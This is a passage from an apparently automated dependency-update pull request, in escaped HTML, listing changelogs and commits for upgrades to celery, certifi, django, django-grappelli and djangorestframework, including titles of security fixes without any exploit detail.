([#9683](https://github.com/celery/celery/issues/9683))\n- Limit redis to \u0026lt;=v5.2.1 to match Kombu ([#9693](https://github.com/celery/celery/issues/9693))\n- Use EX_OK instead of literal zero ([#9684](https://github.com/celery/celery/issues/9684))\n- Make wheel metadata reproducible ([#9687](https://github.com/celery/celery/issues/9687))\n- let celery install from kombu dependencies for better align ([#9696](https://github.com/celery/celery/issues/9696))\n- Fix stamping documentation to clarify stamped_headers key is optional in visitor methods ([#9697](https://github.com/celery/celery/issues/9697))\n- Support apply_async without queue argument on quorum queues ([#9686](https://github.com/celery/celery/issues/9686))\n- Updated rabbitmq doc about using quorum queues with task routes ([#9707](https://github.com/celery/celery/issues/9707))\n- Add: Dumper Unit Test ([#9711](https://github.com/celery/celery/issues/9711))\n- Add unit test for event.group_from ([#9709](https://github.com/celery/celery/issues/9709))\n- refactor: add beat_cron_starting_deadline documentation warning ([#9712](https://github.com/celery/celery/issues/9712))\n- fix: resolve issue [#9569](https://github.com/celery/celery/issues/9569) by supporting distinct broker transport options for workers ([#9695](https://github.com/celery/celery/issues/9695))\n- Fixes issue with retry callback arguments in DelayedDelivery ([#9708](https://github.com/celery/celery/issues/9708))\n- get_exchange-unit-test ([#9710](https://github.com/celery/celery/issues/9710))\n- ISSUE-9704: Update documentation of result_expires, filesystem backend is supported ([#9716](https://github.com/celery/celery/issues/9716))\n- update to blacksmith ubuntu 24.04 ([#9717](https://github.com/celery/celery/issues/9717))\n- Added unit tests for celery.utils.iso8601 ([#9725](https://github.com/celery/celery/issues/9725))\n- Update introduction.rst docs ([#9728](https://github.com/celery/celery/issues/9728))\n- Prepare for release: v5.5.3 ([#9732](https://github.com/celery/celery/issues/9732))\n\u003cp\u003e.. _version-5.5.2:\u003c/p\u003e\n\u003ch1\u003e5.5.2\u003c/h1\u003e\n\u003cp\u003e:release-date: 2025-04-25\n:release-by: Tomer Nosrati\u003c/p\u003e\n\u003cp\u003eWhat's Changed\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix calculating remaining time across DST changes (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9669\"\u003e#9669\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003esetup_logger\u003c/code\u003e from COMPAT_MODULES (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9668\"\u003e#9668\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix mongodb bullet and fix github links in contributions section (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9672\"\u003e#9672\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrepare for release: v5.5.2 (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9675\"\u003e#9675\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _version-5.5.1:\u003c/p\u003e\n\u003ch1\u003e5.5.1\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/088c39c0f78b23a9cdf8d1c9e265ea64d02cfd86\"\u003e\u003ccode\u003e088c39c\u003c/code\u003e\u003c/a\u003e Prepare for release: v5.5.3 (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9732\"\u003e#9732\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/0c1c52b7c361b65c286b30b13973df741799f4ea\"\u003e\u003ccode\u003e0c1c52b\u003c/code\u003e\u003c/a\u003e Update introduction.rst docs (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9728\"\u003e#9728\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/778b009ffbad7c7d8061a4e7cc4c4445ec541da3\"\u003e\u003ccode\u003e778b009\u003c/code\u003e\u003c/a\u003e Added unit tests for celery.utils.iso8601 (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9725\"\u003e#9725\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/b00c1446d809b8909c4932674c49a7659838aaa6\"\u003e\u003ccode\u003eb00c144\u003c/code\u003e\u003c/a\u003e update to blacksmith ubuntu 24.04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/5aae2ca5f455e148cd59de89907459265c5b81fc\"\u003e\u003ccode\u003e5aae2ca\u003c/code\u003e\u003c/a\u003e ISSUE-9704: Update documentation of , filesystem backend is supported if cele...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/7cf9d8987017ee6414644ff7bf32756860255d2a\"\u003e\u003ccode\u003e7cf9d89\u003c/code\u003e\u003c/a\u003e get_exchange-unit-test (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9710\"\u003e#9710\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/b06e53f324f0cfe2b1c98b99d7a8a158d7034dea\"\u003e\u003ccode\u003eb06e53f\u003c/code\u003e\u003c/a\u003e Fixes issue with retry callback argument types in DelayedDelivery (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9708\"\u003e#9708\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/b6cab29e6932f100c9f30706ce2600ccff5e14e3\"\u003e\u003ccode\u003eb6cab29\u003c/code\u003e\u003c/a\u003e fix: resolve issue \u003ca href=\"https://redirect.github.com/celery/celery/issues/9569\"\u003e#9569\u003c/a\u003e by supporting distinct broker transport options for ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/5fc068cd4561ddddebaa5abdde947a90105fa59e\"\u003e\u003ccode\u003e5fc068c\u003c/code\u003e\u003c/a\u003e refactor: add beat_cron_starting_deadline documentation warning (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9712\"\u003e#9712\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/c7bb67f7412c61477473299ae2f251d5731be3c1\"\u003e\u003ccode\u003ec7bb67f\u003c/code\u003e\u003c/a\u003e Add unit test for event.group_from (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9709\"\u003e#9709\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/celery/celery/compare/v3.1.18...v5.5.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2015.9.6.1 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2015.09.06.1...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `django` from 1.8.5 to 4.2.22\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/7275cc5d1326fad562725ed47fbe5eb149dfa6fb\"\u003e\u003ccode\u003e7275cc5\u003c/code\u003e\u003c/a\u003e [4.2.x] Bumped version for 4.2.22 release.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/ac03c5e7df8680c61cdb0d3bdb8be9095dba841e\"\u003e\u003ccode\u003eac03c5e\u003c/code\u003e\u003c/a\u003e [4.2.x] Fixed CVE-2025-48432 -- Escaped formatting arguments in `log_response...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/c62f4eeda774b10541154b9e980f5b981030c4a0\"\u003e\u003ccode\u003ec62f4ee\u003c/code\u003e\u003c/a\u003e [4.2.x] Added stub release notes and release date for 4.2.22.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/c5b42632c95fdaaa46e2b9b512bf39346e21abc9\"\u003e\u003ccode\u003ec5b4263\u003c/code\u003e\u003c/a\u003e [4.2.x] Fixed \u003ca href=\"https://redirect.github.com/django/django/issues/36402\"\u003e#36402\u003c/a\u003e, Refs \u003ca href=\"https://redirect.github.com/django/django/issues/35980\"\u003e#35980\u003c/a\u003e -- Updated built package name in reusable a...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/32fd8dec5618bd09eccdeb9dbf512043193d68ef\"\u003e\u003ccode\u003e32fd8de\u003c/code\u003e\u003c/a\u003e [4.2.x] Added helpers in csrf_tests and logging_tests to assert logs from `lo...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/acbe655a0fa1200d2de31c6020f310ba9aa2f636\"\u003e\u003ccode\u003eacbe655\u003c/code\u003e\u003c/a\u003e [4.2.x] Refs \u003ca href=\"https://redirect.github.com/django/django/issues/26688\"\u003e#26688\u003c/a\u003e -- Added tests for \u003ccode\u003elog_response()\u003c/code\u003e internal helper.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/dc365cac9b48067d8fa75968fc2e9801293eecb2\"\u003e\u003ccode\u003edc365ca\u003c/code\u003e\u003c/a\u003e [4.2.x] Refs \u003ca href=\"https://redirect.github.com/django/django/issues/35980\"\u003e#35980\u003c/a\u003e -- Added release note about changes in release artifacts ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/c454afbf4c0461fd90f75391dc690b154abba6ef\"\u003e\u003ccode\u003ec454afb\u003c/code\u003e\u003c/a\u003e [4.2.x] Removed \u0026quot;Expected\u0026quot; from release date for 4.2.21.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/5b29315848450b7e7c5cdcd75096b1e172464330\"\u003e\u003ccode\u003e5b29315\u003c/code\u003e\u003c/a\u003e [4.2.x] Cleaned up CVE-2025-32873 security archive description.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/0d5495850a5e4f2aca6dc908d3db2248d96750b2\"\u003e\u003ccode\u003e0d54958\u003c/code\u003e\u003c/a\u003e [4.2.x] Added CVE-2025-32873 to security archive.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/django/django/compare/1.8.5...4.2.22\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `django-grappelli` from 2.7.1 to 2.15.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sehmaschine/django-grappelli/blob/2.15.2/docs/changelog.rst\"\u003edjango-grappelli's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.15.2 (not yet released)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Django Autocompletes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.15.1 (April 22nd 2021)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFirst release of Grappelli which is compatible with Django 3.2.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.14.4 (April 15th 2021)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed: Redirect with switch user.\u003c/li\u003e\n\u003cli\u003eImproved: Remove extra filtering in AutocompleteLookup.\u003c/li\u003e\n\u003cli\u003eImproved: Added import statement with URLs for quickstart docs.\u003c/li\u003e\n\u003cli\u003eImproved: Added additional blocks with inlines to allow override.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.14.3 (Nov 24th, 2020)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed: Compatibility with Django 3.1.\u003c/li\u003e\n\u003cli\u003eFixed: Docs about adding Grappelli documentation URLS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.14.2 (May 14th, 2020)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed: Django version (3.0) with docs and quickstart.\u003c/li\u003e\n\u003cli\u003eFixed: Dashboard with metaclass.\u003c/li\u003e\n\u003cli\u003eFixed: Missing variable in RelatedObjectLookups.\u003c/li\u003e\n\u003cli\u003eFixed: Sortables with tuples when using StackedInlines.\u003c/li\u003e\n\u003cli\u003eImproved: Removed six dependency.\u003c/li\u003e\n\u003cli\u003eImproved: Changed bodyclass in order to allow adding more attributes.\u003c/li\u003e\n\u003cli\u003eImproved: Adding Python 3.7 /3.8 to CI tests.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.14.1 (February 10th, 2020)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFirst release of Grappelli which is compatible with Django 3.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.13.4 (February 10th 2020)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed: Select2 (Django Autocompletes) with Inlines.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.13.3 (December 27th 2019)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed: Horizontal scrolling.\u003c/li\u003e\n\u003cli\u003eFixed: Changelist with custom filters.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/4713e35834ba7027087da2ad23988448fcd1b451\"\u003e\u003ccode\u003e4713e35\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into stable/2.15.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/05ff146d8d450616f901311c488b072ced67355c\"\u003e\u003ccode\u003e05ff146\u003c/code\u003e\u003c/a\u003e constance template update, fixed \u003ca href=\"https://redirect.github.com/sehmaschine/django-grappelli/issues/973\"\u003e#973\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/ac35b747b927899c5c3a0f8ed042caa4eaaff1d9\"\u003e\u003ccode\u003eac35b74\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/sehmaschine/django-grappelli/issues/976\"\u003e#976\u003c/a\u003e from ksg97031/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/4ca94bcda0fa2720594506853d85e00c8212968f\"\u003e\u003ccode\u003e4ca94bc\u003c/code\u003e\u003c/a\u003e Update switch.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/4aa8d072ae880e63de96db0476a1e0a0351b76cf\"\u003e\u003ccode\u003e4aa8d07\u003c/code\u003e\u003c/a\u003e fixed pagination ellipsis, \u003ca href=\"https://redirect.github.com/sehmaschine/django-grappelli/issues/974\"\u003e#974\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/55f88d661c28598d059cf81dbfd38dacb945662f\"\u003e\u003ccode\u003e55f88d6\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/sehmaschine/django-grappelli/issues/972\"\u003e#972\u003c/a\u003e from dandicocco/reversion-patch\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/355414eb378503058f28f32a1a5471f5dc68c3de\"\u003e\u003ccode\u003e355414e\u003c/code\u003e\u003c/a\u003e update revision.comment\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/d46c4d75f7380f0baf9a6a9dece79c76468ce402\"\u003e\u003ccode\u003ed46c4d7\u003c/code\u003e\u003c/a\u003e updated changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/33a4e8a5d8854ecc76c6acd5b384181343e9c33c\"\u003e\u003ccode\u003e33a4e8a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/sehmaschine/django-grappelli/issues/969\"\u003e#969\u003c/a\u003e from maximdeclercq/stable/2.15.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/7d5dcc4d781528f12cfade0102bdc95221a7bf0c\"\u003e\u003ccode\u003e7d5dcc4\u003c/code\u003e\u003c/a\u003e fix(autocomplete): fix styling for native django autocompletion\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/sehmaschine/django-grappelli/compare/2.7.1...2.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `djangorestframework` from 3.2.3 to 3.15.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/encode/django-rest-framework/releases\"\u003edjangorestframework's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.15.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ca href=\"https://github.com/api\"\u003e\u003ccode\u003e@​api\u003c/code\u003e\u003c/a\u003e_view example to caching documentation by \u003ca href=\"https://github.com/BradWells\"\u003e\u003ccode\u003e@​BradWells\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9131\"\u003eencode/django-rest-framework#9131\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate docstring by \u003ca href=\"https://github.com/jthevos\"\u003e\u003ccode\u003e@​jthevos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9340\"\u003eencode/django-rest-framework#9340\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eApply black formatting to caching markdown by \u003ca href=\"https://github.com/jthevos\"\u003e\u003ccode\u003e@​jthevos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9341\"\u003eencode/django-rest-framework#9341\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate renderers documentation example by \u003ca href=\"https://github.com/mgaligniana\"\u003e\u003ccode\u003e@​mgaligniana\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9362\"\u003eencode/django-rest-framework#9362\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoving live examples of tutorial code that are no longer hosted by \u003ca href=\"https://github.com/TGoddessana\"\u003e\u003ccode\u003e@​TGoddessana\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9363\"\u003eencode/django-rest-framework#9363\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDocs: Remove an unnecessary step from quickstart.md by \u003ca href=\"https://github.com/gogowitsch\"\u003e\u003ccode\u003e@​gogowitsch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9387\"\u003eencode/django-rest-framework#9387\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDocumentation: Add Python 3.12 to the requirements by \u003ca href=\"https://github.com/Szaroslav\"\u003e\u003ccode\u003e@​Szaroslav\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9382\"\u003eencode/django-rest-framework#9382\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTweak README.md links. by \u003ca href=\"https://github.com/tomchristie\"\u003e\u003ccode\u003e@​tomchristie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9375\"\u003eencode/django-rest-framework#9375\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u0026quot;Ensure CursorPagination respects nulls in the ordering field\u0026quot; by \u003ca href=\"https://github.com/max-muoto\"\u003e\u003ccode\u003e@​max-muoto\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9381\"\u003eencode/django-rest-framework#9381\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003euse warnings rather than logging a warning for DecimalField warnings by \u003ca href=\"https://github.com/terencehonles\"\u003e\u003ccode\u003e@​terencehonles\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9367\"\u003eencode/django-rest-framework#9367\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e20240426 docs by \u003ca href=\"https://github.com/peterthomassen\"\u003e\u003ccode\u003e@​peterthomassen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9392\"\u003eencode/django-rest-framework#9392\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCleanup by \u003ca href=\"https://github.com/peterthomassen\"\u003e\u003ccode\u003e@​peterthomassen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9393\"\u003eencode/django-rest-framework#9393\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003etests: Check urlpatterns after cleanups by \u003ca href=\"https://github.com/stanislavlevin\"\u003e\u003ccode\u003e@​stanislavlevin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9400\"\u003eencode/django-rest-framework#9400\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: Correct some evaluation results and a httpie option in Tutorial1 by \u003ca href=\"https://github.com/wkwkhautbois\"\u003e\u003ccode\u003e@​wkwkhautbois\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9421\"\u003eencode/django-rest-framework#9421\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e__hash__\u003c/code\u003e method for \u003ccode\u003epermissions.OperandHolder\u003c/code\u003e class by \u003ca href=\"https://github.com/vanya909\"\u003e\u003ccode\u003e@​vanya909\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9417\"\u003eencode/django-rest-framework#9417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix potential XSS vulnerability in break_long_headers template filter by \u003ca href=\"https://github.com/ch4n3-yoon\"\u003e\u003ccode\u003e@​ch4n3-yoon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9435\"\u003eencode/django-rest-framework#9435\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eVersion 3.15.2. by \u003ca href=\"https://github.com/tomchristie\"\u003e\u003ccode\u003e@​tomchristie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9439\"\u003eencode/django-rest-framework#9439\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/BradWells\"\u003e\u003ccode\u003e@​BradWells\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9131\"\u003eencode/django-rest-framework#9131\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jthevos\"\u003e\u003ccode\u003e@​jthevos\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9340\"\u003eencode/django-rest-framework#9340\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gogowitsch\"\u003e\u003ccode\u003e@​gogowitsch\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9387\"\u003eencode/django-rest-framework#9387\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Szaroslav\"\u003e\u003ccode\u003e@​Szaroslav\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9382\"\u003eencode/django-rest-framework#9382\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/wkwkhautbois\"\u003e\u003ccode\u003e@​wkwkhautbois\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9421\"\u003eencode/django-rest-framework#9421\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ch4n3-yoon\"\u003e\u003ccode\u003e@​ch4n3-yoon\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9435\"\u003eencode/django-rest-framework#9435\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca 